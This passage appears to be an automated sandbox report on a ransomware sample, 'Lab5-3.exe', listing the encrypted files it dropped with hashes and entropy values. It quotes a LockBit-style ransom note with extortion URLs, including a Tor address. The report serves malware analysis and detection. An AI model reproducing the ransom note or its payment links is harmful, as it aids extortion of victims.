                                                                                                          SHA-512:874FED498F1DF20F8C7DF56F088E7D351B852FC839ABE5849D166CD42C363496FFDF207EC5EDECA59685849FA79473202ED5A7DBCE9C9B496FD43647CD0BEA2C
                                                                                                          Malicious:false
                                                                                                          Preview:...3W$x.L....u..;.i.'..R;...93.B..0...tS .(.......=gN..Ao..2t.w.ms&d*L...x..U`,v.Z...a...i..cC@i.j,(.0..N...vCa.tB1.....E..Z.C..M..{..m..d....j"F..Q...|...4....._NW....m#SB.V.X6.(k<.T.....7...Q.$Z'..j..b.t.......Q.....~5!.....H#^..9.NV......T!.....T$Q7jc6#.y..#.u......q=.h.........I...z....y...8..2.1.I.......9t.......}...*........cR.N4...Y..A...E0&..A.-XV..n).)..c.tU.;/...C..V...cx...?.y..):{.....A...+.....c&..i.dj.W..;...!..YcG.....kgA.....2..;.>J~}....k......U...w..../0....wVhu.{."y.. ..{M.E...@......5.G...=Vk.R..^h....).c.,V.P...E2...t.l.j.!g...,.}xmV.'..LX..3^.5.xY.M.F....G......E..P.G..m...A....w.e.(.'.K.5.*..&.3....F.C.W.....7..&..qe.q..I... .q...-.*..\5.n..] .*gYPwrH...j...M"!$i=...@".jnM.Pd..../.'*.....yB..(...;..rI..D...i.l.&..M.....Tyu5u.....8.-.=..Eh.....Y.\.....V.y..\...gJ..YD_C^..5.ne..(P.lB..h........6.^.m.S...G...X....t...,..m..wv.a.+Y...._.@Ts...:.|~h.......AIUv..aV...uW.0.A.;;.o...%}..\ G.I....L..;....V........g.h.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
                                                                                                          Entropy (8bit):7.93140481190512
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7qMc2SCWsTfDYgmXl4zYb35hNxtYjAxpBfHfUTid3hBaUoSGFcmeykEdEElU92i:e9nCbfDYXXl4zQ35hlgAxkGx0uKeY2E+
                                                                                                          MD5:D364CC5FE51E0C7E5F0AAF138BA8A8AB
                                                                                                          SHA1:E3F0864031FB4CB24DC9DAF6ADCC8F87DB50DF01
                                                                                                          SHA-256:0E29013F912051441475086BD5100CB787EB0E750893F7C4E2DBAC90EF0DED57
                                                                                                          SHA-512:E3F8D936AD9BE297C5509F1247BD58F550006F40DC8D9D4272CAC857D8C3AE507D5285BFE75248A47FA1270BA3FA809A63309C9529CAE0B63EC0EC438D68C065
                                                                                                          Malicious:false
                                                                                                          Preview:.qp.&.2.......|...R....3....<....!|'./..a.....x.F...:..u@..L..I..K...(....5......V.........Vn._....'..fV.j.}....~Tq......i.....E...t.Z..ph.f...];h..13.X....6..'.[ ..i)....l...;..P..?...H..Q.<.........5.)z..fh..-...)rR.8v0g,.........M.I...(d....:..HJ.O.V...u.....m.,#O.1.L..9(......p.^Vs(.,\+.@.D@b.1....t...b.Rk.I}.,Y.]H^...e1JA..t..]..FF.d.G.5...6..v....aS..(oG..o.N...>-c.4>.K.S.[.........,b.A....)...A4.4;E.jy*5.Z....RZT..D../.....$Q.C..{...+K6u..{bU=../.....*:.>uB%...g...........7.I"y .....SFo.....Hv...u$.xN....t.H.y..5.$...e.....t\>..^.lC....gD^~.|..h4...D.~...W*..m...GOY.......*~..C....P.CNBe.m.q....!Pj...c..g.z....h..R).~.g.mw...y@......EG6%.H..7.M1.z.S .h.o...U..._y.[..-.z.1.8...$...X.\..Wg..e..'*..vQ.o...Ul...t+.q....W.O+...d..m....\N.nH5.@.../....7..my.....%. ..F.E.......*.t.E...U1.....V}!.....m\.-.....5..l?.c.H,.f.5...=.;~<? X.@..[VA.?.G.........,=...7R..6.g.z.....`..".....e..7.rX......dU.YP..].p....B...d)....u@*......A.........[..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3600
                                                                                                          Entropy (8bit):7.952220957250472
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S1Iqkl7gkGhpa6VM08X/IsA0a16CaAt0AvcuMj2W87xEbVPHfUTid3hBaUoSGFcJ:Dl7g7TunXNra55Na297Gx0uKeY2ElUJ
                                                                                                          MD5:5D04473F032FE6FAD31FB5EAE309E899
                                                                                                          SHA1:18902ADFBF649480E6E47B26287AE352439AC6AB
                                                                                                          SHA-256:87D376BF9A3350197E9E72DB7681D67CD135087B00317A14A46D53AFC7AB06C8
                                                                                                          SHA-512:810461AB1431C1AAEDEFEB543F76DCF0AFC24089C995A9ACCB3649E5F75D2E25FA1842460394D0359A73E07EF06CACF1005F0ECD3D1A5D917E9C94BC3AFDA3DB
                                                                                                          Malicious:false
                                                                                                          Preview:.).O.j..S?1o..z.W......H......&.\...g.Sc...6I.\F..W%C.u......;o..i..e.m...P...y.2.Q_..f...6.]}..K.4......9....].GoRb9."(.5...$.......Z.*...V...;x....^*@..UP.E.1...).pw.*.W`...^.qh..nW.QSv.{.[..Z..M|.p..[..|.LE......&....q,....U...s.....d..._u.@.1R.'.8..c.[.xB....&.a@....]...z.aq...h..,....^L..N.......3..7...&Q.V..).B.........*..Y.@.(..vo..9R...9...C^..-.....<<+...3.......??.OG.....o.q.............@zK.I=p.-..=.t.q-....}..)\.TCQ...%7Yf[.\X.sQ\C=.+g.+.+:r...C...G+oX.a.m...G...O.N...c7..!9.Ai).....a.$...41o..\O..L...A..Y...S...N....mC.i...]....)..M.!.~(...w.....TMJ......f0.'..".&^..o....7..=U.d.@.........~..U...Am..gN^e.HP=.v{.Z.U=!P..5..f`...yy.B.D..08f._..L;..b6.-?..........Jw.......(..a..l..h?...N.$..z I.>'<6.0.Y.].^.....a4....0)3.."... ut.b.....7...f.l...j.."....!.G..'.e.L....,..)...../051.^'.....W...c...D ....S.?o..zf....;.,...t.g..M(..x.={. 6q`;...O.2...a.*....E....s..D2....M.].&c...HL4t...._m..V..Y...]...d}.m.o.....Ch0.6.........C
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6928
                                                                                                          Entropy (8bit):7.9727643481119905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:J7sc3g466eHSRC4nvd+mlaidA7pcI+Sc4E0Cb:J7d3g466eywGvdkikmI+Swtb
                                                                                                          MD5:FC02F6057EF38ED5A6B5201BBBE872E0
                                                                                                          SHA1:7A1F5630483BFA0112DBB90F375DB1AF13B8D2BB
                                                                                                          SHA-256:39C58A8287D08DF9792D2A837ABF5AD895C7C58CF127A648B4DFBA0BD50061C5
                                                                                                          SHA-512:16F285EBD93CE1B17240AFF31FB525E6F67237A284A8267657F9BF660276150E47FB9FFA7744053A2F6775E01F3D8889FC7B457450FA6BF5D56DAA6760C86780
                                                                                                          Malicious:false
                                                                                                          Preview:.fT..j...T.......8....:.3Ve...\.|.2&Z.#D*.e.r..$T8!\..s..n.?...]w..o$.T1\Bu4.W..4....,t.....1.IP.wiHJ.m..X. .....?cf........!w3....<..Tn.K?9y.g.Q.Rw.$.0..._..U..;...G.iA.{.;9B.1U..^MV.s.. ....+.;-F.Y..j#A~~...j.`..:fwd^.R..P....4.L..Iu..zP..e.)n..@~..V0....f..0..]..~.....f..).V......{...N.j....x.2...SG..lm].\..M==q...W)-%.......z.P..1..m.....V.......r3.....a.=.!.U.Y)..m....^..A...>mW).."Q..._....U.._....qR._.~... ...q..%75!.9<.H.zA.]..]...D...\.B.5%.F.....M.8..W.D...O...m.WT.c.5........Y...m.aAz6.....z.T.mts..M.......x...,.w...;.U.....l...)..*wq...I..x.*.../........[.o...c+&...0.y@.ma...?.R3.Y.SI..>.4..,...$k..$.....%k...z.NH...a.....w[...k....g.TC...E..$..~../._...x..;s..`Z. .([....v1.vo..Tf.......xE8...".a.]..B...g.3Y..."..<.oWx......{.J...*...<N..7.flp8... $\....o.K.W......P#k....:.j\........jaI.....W.Hd..<.(..f.r{....J..ZN..pY..O&...q.r9.C...&McBL ....o...&.nE(..c...vA5..w.8hQ*....o.(U.;..Q$B..:6......=.b..A.*..,B...>O..ca......k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6048
                                                                                                          Entropy (8bit):7.970920581003255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:f5x3vyVSVh2C2IKoGj62lIed1qqADcCtNL41l5/0lC95d9HGx0uKeY2ElUJ:hxtQC2MGvR1bArtVo3/OsS0Cb
                                                                                                          MD5:2610678C4C71B97D2F326C648C0C755F
                                                                                                          SHA1:DD02ECA5F491D8772BD882E32779DB36C57C1A25
                                                                                                          SHA-256:A53F6E2393FDF8790F9BC2F4D95932DE0031B6C0CE5E82F796BB42C0AE591FBE
                                                                                                          SHA-512:29E5EA513E44D4AD5E7037720CFB2DE80698F66B212D721ACCB3B8B794BA5D966589957F71F817D008A1349F3CCB4F8FE383627DFC0CE77292CA32945C0A7A48
                                                                                                          Malicious:false
                                                                                                          Preview:,.'..3.._|.....9X.|s................Ib................49,....G6...Z..."..d...bK .N=...X?s._3....g.....b.0.. .]d....+>..-...{....'j..5.lh....o.n....].E.{K...0.%V.~.....X._.B.b.m.+@F.w.....j.^99..k:m8.}....v\.;K..V.E.k..!..>.;D...h'...A...m....$...E......z"S.5p.h.\....:fO...?Z.r..2h.......>...s.2|.>B.....I.J....o$b;Br...X...D.rF..........2+:.(j..&..S[....*2.<...UV5.....&.~..L..........T.s.6.$...j..R.sC2D.].eV.....\5...:7{..=.....4._Y.1?.I...C....l?.R)..8M..=...-.o.S..e..&.....tag..L.3.tD...m.r...0#u.,.[.x$.l.f[v3.-M$.z..n.9.N%.=.......~ .r+v>Ku^..O..h../{.,...*..b}........l8f.#v?"d...0..B3....R@..=T.,I.....32.$O..L....e.!Y~.g.}....Kc.Y...<....7....Bv.bI.^...=...p']..f<-.i"..:.\E....Y..R@#....5....~en].J..zrSTl$..5.`....C...\>..l*.....]c).j.r.0..OMPN../-..1....g#p.....jF.s.......YO1.oB..5.7.m..k.U..$..I.....T{oE8.kRf-.f<..$|S..{..x:..z......1.4>M.Q.*:.....-S.&Z..t3.5..w.2..._.h:..Y.@...F..-..b...:.)Jd.=.....Hu.j.cVd..`)...,...YyQ..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.9454978698800085
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:s2tj4tbKR3GG7o0Fz495jGx0uKeY2ElUJ:Fj6mJ7HzY5A0Cb
                                                                                                          MD5:74B84AD8D768ED8791ABF284680FCBAF
                                                                                                          SHA1:90D7AF1B1B7038C0F5E41BF05C274D1DE03F09FA
                                                                                                          SHA-256:13AC22770C2D53E23147EF76FB995BB94C3776A14F0C5CBC269D90B86EAE6087
                                                                                                          SHA-512:9F84E1658BEB531925AE0564525F3C40A00214B8D3F5022FEBD822D653F834C716985B0EEBFE6A60A051B0D443E4327FE14258144CBE696E9480B5821C1F76F9
                                                                                                          Malicious:false
                                                                                                          Preview:.P...E|4...Q..l.@..J.}.X...4..Ka9G.I.F.[.....,.x|....M..".....;O.Q..U.D:.r.a..7. O..X3.>.tG.....Pc..T...=|p.^..&p&...R.b0..>\.$...@:.~...0....^..`.8...Fu.mU.........YM...}ImT...^.....6...."...>..eZN..3......7.x.....i.L;.gYRr7..?U.,...........X.@.....&....C..:...kH<U.2;U..m.Y.>....g.|.........R.....V83H2..-..dY....MM........+...:..o......!....K..;..D.N.*h...q/.....~W...v....V0.3.D....A...U.k}..Fn......1....j..,..*........O.R./......`^.~8]..t$.T...w+:...h...k:/.....L....z...S)h........$..2+.#N.&7..q<..5..n.x....B3.v...:k..*....Z2.R.....Ty.my..,[6..o...#..L9.\.O*6...&QQ=.....S}.m........qj.g..V.+H..H...E-.....]h..b2...#.Q.....t....3..u.t=..5h.hf..=.].@..-5.}. 48.....J'L..&.........q,.I..g...t...K.bSb..N._....Z.:.X..M.^3y&~ZO.E./......lP....|&W..F.\...=..fB.q#.SYet.4..^b.2Wz.qw..F[8........c..K..)..._..7........hF.....PP..,3..A;&....YxK.oo.]f...z.....|?12.?.:.9;..X.F.y_[..z~.^.d....\Y...'~?.7,.'%.a.).;T..\W....b....-d)...R....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.928382239236822
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:q7V1DernXlp+wKI30T2CcjHfUTid3hBaUoSGFcmeykEdEElU92i:aX0nr+wP30T/cwGx0uKeY2ElUJ
                                                                                                          MD5:DA33644909468D4DFA66062D2689CD7C
                                                                                                          SHA1:D9535A5F058F66FAC475FB2F5C0412037CB60BA1
                                                                                                          SHA-256:BDAB76B09BB5119255F4B53AC830367E1B5D50751B47B9DC05A592E2A67EB2D6
                                                                                                          SHA-512:D4709641DCF8558712AFC376D7989A242192AEF46095B56CED12792FC41E7673A02070E0D6121C1F9759A6C549AD3E88C0E0D687F07AE927403844112D7C0EE1
                                                                                                          Malicious:false
                                                                                                          Preview:a..x...<&..B.CG:F2.1Y..a../..?.h....r.........|.T[.|~...j...<....f.....J..[MT....7R..i..S.7?.8....,.2..........24.r....|..O}.k.4..R...I.b.X^h.*.K...A.@..8...-.0t....D.C.....k.]GxM..k.ds&2..ge.y...m..@._ ..^.......6..'..X..g..v!...g+..8$?.._~.z.$d......s..-...J...P.....g.^<.(F..X.K..j4.3..5qH.O..1...Xx.....9...5..rm..G_{.Q.:..=.M.ttq..p.....OD!.Iu._....?.P...I..D.0.>..,.[.N...#...kz.&..#.1Z.U}.y..J..Ao...V....N.I...M..(...|1..%D9..a.+f...P90_..}....;}.....W..$2QBCI3......../....!...y}_..L.X.^.....s.L.._@;.J....@(.`..tu+..(.m...hi...[m<r`..A..i............&*JrG..U........t......u]...H..A..0...@v`.b.!..4..[..@..T..+...I.....A? ..#..........yR.....t..........,....)..........,b.4.|...%k=...._{>.......~A.F......p..X?i<.Q.......H.7.~....#,KWC!.E...L]....9..*..1Y.j..0N...]...A)..0e.\...Q...n...W.2.v..@......kw....E..'.Y .^...b....d#...Z..@I...-......f..#....S.L0.........F.....=<...^1......Jx=..&y..|R.N.P.9..X...@.......^.G.D.g...}#C....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.943734635835847
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kr01r2qD15z8jKDUntpwHSyeMz7L4HRGWHfUTid3hBaUoSGFcmeykEdEElU92i:krC1l8FbwyyeMz8RIGx0uKeY2ElUJ
                                                                                                          MD5:269CEEEBCA006111FCF9FF4821347B14
                                                                                                          SHA1:0430D852A494C4ABF0910F4DB249D5BC7165D696
                                                                                                          SHA-256:E0A7130679A5C3D330E6EE171C9DA33578BC6A69A04DA7233F2CD187C227A06B
                                                                                                          SHA-512:293EF0C8D766BD367EF8A239B0406AED372095DF11145F27784DE5643F3F74E5627516CCFD1DE5F7935F6A2C7E3B7FF40F905304DC8255EA7C64CD8107DF1AB0
                                                                                                          Malicious:false
                                                                                                          Preview:.W..+.A....(....h...<A~..h.......Y..N'^.F...6.NIN........n.....(}6..XQ..p6C.....`...E...r7W.......Cr.@5i.@.A.S...+.&O....}..0}.../.g].=7.E'....h=..)M....{'?Y..,>..9....s.y...)........f..7.+..YH....`..)..d;S....b..F.f.w..(.r.E..s..(].x<.)+.q........((....%.\........=/\W.....(2h.L.DeJ.U[....%.....2...`.:..t.N..".rM.."...;;..z.(..o.l./*.[]...&,....n$..k@.."+x$.*l.8.....Y~P.H..`V.86......}.c.8....b.h..Dma....S..{aQ.+p.J.m'o.9Z.P6[........y....6...!....@....I.....@...TEP.Z ....|.....{.{.[h..t.g`}..ri.j....wQ.8..4.$Q...C...1.J..(......g......c[..f./."..]..(...FlY.Lc.K....ic...mD.~f...+&-T..V..=t.R.8n.<....x`.u.....G.3.!.....Gr5.M..?..6?l..-.q..&.v.../.......`S.,.V. .@..N.....4.+...+H"yE{2.S.5..!...:.#..jFsC.>!8_.D.;!..VpQZ.....tz.NYs/w..*.0..s......N..{C.F.;#..P..Z.-sw,C51.a..Z..\j...g...&..v..7..3.`...Y..D..Zh.D.k..Nj..t.\...YZ...:._..W....=O.|TM..h.w..lSr..5...^..F....u.9Q..Ql......T_.W..../.Q...i.....a..}^2+./.P.k./4...v<~....HU...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5152
                                                                                                          Entropy (8bit):7.963070634215786
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:htuMxYOSOobtPghCgCQ5XMDaBhTw27qK7SlHGx0uKeY2ElUJ:ZspghfYDuhTweJ0Cb
                                                                                                          MD5:EE5D8ADCCC48CFED6E222081C78BD136
                                                                                                          SHA1:225EE92310106BB009EF3B43310FB7CF6BEBB27D
                                                                                                          SHA-256:A81663A7301FCBB411A9A2620BAA824F1D9D8BEEFB775AF5E40E77B6DACFA86A
                                                                                                          SHA-512:E5C58732B0F290C2121F521B04EC13DCF8CA7F8D83AE1E0643869DAFE6E49D22E109BD5F33DD44562CCE5B39C7BE5AD3F0E46B8A98FE875BA85B3721DDAE5E00
                                                                                                          Malicious:false
                                                                                                          Preview:...t....-v.......MA3....Ce....[.m....68....u>.......8k...+u .NhWR...:C.....x.....L.....F...N...Rx.\..... .l.}..:.M...... ..L7.]....a........jSC..L.21...+..{.H.>...r.F.{....cW.NZ4+=..Y.!...T..-...?.....D'......S.(..;\1.._....A!t..F..U.C../H....c.i$hI.....p...1..<.....K..~....Dt.......i..........<$..lsY8.@D.yj\j;..)}.|V.k.!.WB.........I:.S......Hx(.G.<.Z.<I...]..."...Y.ZK.@.f.!.(b..}.x..,...Tx....3.W...D...J...db.z.....|....}...d.C.n._^....~V..0..4..,?6.~.d.6.@[Mz.h..?.T..n..r.......7......;....IW.~..I..6P.2.{..:~....E-%v.u.A7..!wC .B.....M...!y......~...4./..{."=./a...R.....I`.:.T_3.......rd.7b.y.}@...'..0..1....(K^^.b+...Z...H.<@)..aK.3!>...._x.#..rv3..!O...V..WN.+...w....-..."...q..'..w.NK.8....1?...._.....?J|g../....!.4......~.r1p.%.>..O7..`.L.k..8W.M.X.Rp.yu..$......(?U...f..SB.i..S..&.?...qp.x.j..............~w7...~\..^..m.....<....&y.Px(.^4..U........yt.....0..7...l...}.z.N...*9.H16..j...oma....W..(...u..../.|..~...}+&.../..............Y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3168
                                                                                                          Entropy (8bit):7.945211102492998
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:E3rm9c6pnxCRoG/5+TQtJGx0uKeY2ElUJ:2C+6pxCeqWsy0Cb
                                                                                                          MD5:6C7F52DEE4C0E5072B84A285E5AFB35E
                                                                                                          SHA1:99A8E653930C46E1D8A9AC3EA8756642BF78F055
                                                                                                          SHA-256:7F37A05CE4DA673E33931848015CFC3B890189B463FE940BD987B4B5B02E0EFC
                                                                                                          SHA-512:50252520B54232EA78D4F94394DBD1707EFA0C41F68BBC4E37ECB6B5253E69CDA8D09A90FF929203876F2A6A3028CF9D72B7FBA39019E02C41F8D02053E20B47
                                                                                                          Malicious:false
                                                                                                          Preview:.X..).......R...;.Atr....../.HX...r7~.#mT.d2./2.tX....}...f..r.o.jt.I3.o.X.iThd...-....v..JrA..E6...e.y...I...:..`.E...w.....+:.....7...............'....&.k.0.,8m>.k....F........qC....B@.8....t.;S...3RX) E.xz......=..[.OAx.hp....^..$.}Rf..{.H.X.q...;.[..Y/..s..?....5...>..f(NS....k...+Nw..T.i.2hP.H.9c.ax`..A.....z.m0;.g.@.}......9...{ ..Nd...[j..(..-.w\8q.J.b..._..|5..y..3r.}[D.sZ.8.....1.vGOO`L|....b...T..(.^.PuAX..<.\..cN.\......,....$.....h.CcN....t......?.:.M@ia.'S=..'..x...f...<..}'.....If...m.......3..^..si.Y)3....;..q..4.I.....2.BeV%.F~.S.a<g..':.......?.j..o.T..tvC........{K.Rq..J....f.y7....k....b."].)*..~...T..$.J. \.N%`t.GH.%.f....3....[%.b..2?.r.#....=..#.o<?u....4.......E....B.."..._..U.~...W9.....I..i.....M.o/.?.@...Q..y..;.*f..u..`p.k..\b.....f.(.......tp.h.......D...........\B.........).gA\..z;...U..W~...#.O^.[.*...i..q.W.J..j....Srs..^#...X...f..7M!.....;.S.3XZ.X.l...0.....:Uw4m..T..L...Y,.....xl$.,J..F.....t...Z.u9-e.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3888
                                                                                                          Entropy (8bit):7.950320475244758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:IarVn5cFCeC2aWKEVF2AGlgsGx0uKeY2ElUJ:I4n56C2B6lgf0Cb
                                                                                                          MD5:04934A39D6630440D0D515250D301544
                                                                                                          SHA1:9173CB3DCEB37CA6D8389CC1A5795E98777332AE
                                                                                                          SHA-256:A5549E4313EFB67668069053E71BB7BD799CC6C9217D8F8E29E3640FC0900A86
                                                                                                          SHA-512:7727270095165D1413ECD0B42AF19BF82D44D6A5E352D3DF99F5A83C8775DEAFCAAC1AF03D504D72E7D512AD46BA1E98CA86073299E0BCC933C556638D577DEB
                                                                                                          Malicious:false
                                                                                                          Preview:F~.F.S>.]..-M....z..y.9^....:,.....#..t..R...}.O.].U.~..&:F5....e!.T.H.<.W...../...VjlT...q.$y..qqJ......>.).C.j..p..G.B.Z.@<... XWgpG..O.hxe@+6..&..=.&.(.......PG.S.-J.....z...0....o.,1.\.*a3...Jq...<YuH.KXA.....$....O..L...=........K0`.G7.`.......8.t.o.....6.#.89..IB#....n...\nQ..|..U.ZN#(.....vc...=.$..<.|.v~...r..qj.X.C3....4PFe...!.......p.j....!..=lh#.wr....Z.....l.pA..E....D.........0.a....=.7.../....a.*.`.F|G..)..N.v.....I...Z ...b............~..QX.*9.U..........bI..m...C.[...........-.|k..%...&....?..F^./..C.. ...cl.$.....-.8.nQ....v..enxP[.h.6a..+..v....H.X_[.g....H....l.....n{S.....d.(%.4*h.j.n&...DN[[..._.....p..._:..`.J...Dy......f.U..1........z.......G.i....d:...j.....Wjt............B....1q....1.!...0.D7T.JZ .wV'.p>2...e">.U.6.....o......DBpjn.uG.q.YCB.....6C.x.m...e.\..n..*A.q`..v..z4.....Y.)..!...n.......!..>^..;.#.0.S...f-G#.........'.k@K.%..^{........H...}8.F{R.t,..u.d.w........'..d8....b...;.=X+.Tb^.. @6W...o.L....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3392
                                                                                                          Entropy (8bit):7.955260351210686
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZFEr2/ehO4hvbqomGPUQzpTGeFOjIlvU4YQdduBunHfUTid3hBaUoSGFcmeykEdM:TyOTkXR2jI5U4niGx0uKeY2ElUJ
                                                                                                          MD5:B65BB0D624A09A5BA3CD44CE6C1067CF
                                                                                                          SHA1:F16064AB83EEC3653F485D965B0227996A5547DC
                                                                                                          SHA-256:DF07627114FCE8E5459CE784CAEEB718EDB4E4A18B763797F368286A60101AEF
                                                                                                          SHA-512:6DFC05B226ABCA0B9400504E8D986ABE023E5402C461107467F0C92C956D11A2CC00C1008E554B1783EE7C7F2B4058AC70636798E678984BF3C4C8A6595778AD
                                                                                                          Malicious:false
                                                                                                          Preview:#......._....EDj..cV_O.A.0dp.....u....Su.`;=.+t_..V....z......[..A<8..}d.d;..L9pIZ...`.[6'.|..&.....T.......7........ ...!m.Tq.d..q.7.v;.........(....6.."...KA>.|Y[...R..j^F>+..*..,.).,..3.i.py.v-...CD.HE]g...........k.8c.t.P.j.Z....LCr.t.5i.IG.]H...4p.8.s...p^yDm]"..[.B.6;+b./inje.(d.D.P........T.............!.!(w...xC..JD...B..s..a.-CB...".8..6.o.XF....7...-`3..Y.7.z.8e..@~.u..'7.....c,!.....i3..L!...C.f..x/~1......ua@f..}..}..cQ....&.....2$....Q...>.....o.b..T......."_..U.....Q!.~C.&{...7K...q.......?.Y.......|....e.....&c.....v.lVT.*...r....D4....0.5}.W.Hq.'.+..f./.]...rfq..&~7...;..'.C...c.A.-u.2.&.3..d..E.k.f....j.$..'.:.hI.;..I*..'........H.dF.....).%..K.0BC...E.T.+b....=..x..X..7`.?..5~.s.#.h..\b....s..^.jn..l...[.V.....d(tug...f....K.3...zwQ.....2[.DCS...4...,@..|.UZ.?..a....iPL...$0i.|..^....t...N..4.X.a.$...M..KL+.{).....__I[......{....'.Y........!.S.vRw..0.q.r.-W..x..I...........g..e.x...!'m8...y2O..G.HQ..D!Bw...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7056
                                                                                                          Entropy (8bit):7.97604447380514
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4PWdNvBcyMvljjZswt5ERdPmD26nFY9v190Cb:4+dIvlX+wt5URmD26e9vvtb
                                                                                                          MD5:0D6D088318A251DF615E6373D12B2AC2
                                                                                                          SHA1:56E00067FAB9A2B4C9B6761F6EFA184FA3BE46D6
                                                                                                          SHA-256:824D1D8DA5D072AC7993E7A86B83AC497C90DF3C2335B129646F3D4DDC76B9E6
                                                                                                          SHA-512:0981D2E79C838F7A5176E4D036528D37DFAB1AB183E1356A1B92C16343A129233B5DAA377C848BD9DF71A858FA80B0B3F591ADF76F12B96D3A0ED6CB79F2D7E6
                                                                                                          Malicious:false
                                                                                                          Preview:4.x....nxX..M.P.&.p..3.7.}v.5;...M....<.,....wx4....(m}.B3cbU.`N99..`.psg:.(...e.]eOP.B<uc..F...5...?.4.!D..be..K........R..j..y.....@......8E.........+....6......../K.....B}.n.....Ux.[mh_pJ....;.......V...3...9.....4H..]whj}....T-xy...PcP......r.g|#..q].A...n."......8..._7......W...q7x3...#..2m.a...U...8.%..k..]E...)_...y..9..(..'..U[...5..~L.R..+4..%.n.2vP..=.o.s?.....K.w.N...R.O.....1.,..c.p.;`.$.qb..Z.I.G...l/,.}.........t..:..~...d..}..A.H.U..U.?H...d..).&..6Q40...R..G....S/m.'y.......e......(..`.~.....I.|.DP.$...*.ir....g.1...3;......MD;.@....H.%..p../.k....R....)e.... &..$ej...m.a#D.........>1.nL...q..sb/....1....f&.q<G....Y..K...@.wR.v.e...p..3......7{...p..d..s.YY.!#'.`."...uZp?.y.1.l..}.^..+../..............d.S...E1.....`p.#.AP..4-.%.,rhPd).i!.....Aav.3.t..D`x..........."......%.jN|......Uk..#B}..j.N'.)YK...%.w..!.........Q.<.......7G...Jd....../*VbNo9...R....2...m.Rn.y.x9.+G.&....G......#$Q.q>ZY7.....}3.._g..Wm.H1..,)P....9k9...9..#G...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53376
                                                                                                          Entropy (8bit):7.996381925311905
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:kLZE7EV0OUU6AAbzpMHjMv3u5OCuYDCx+3y7wp78V3KMKdLySmgg7HS96z52ftZ:5EV0OUU6AAxojMN2C0CP1KZLk7H/+tZ
                                                                                                          MD5:6847665AA2CEE9678C1218848E6F06B8
                                                                                                          SHA1:EFBA7F934C0F7238FA6CA7347CDBF0AF5D76930B
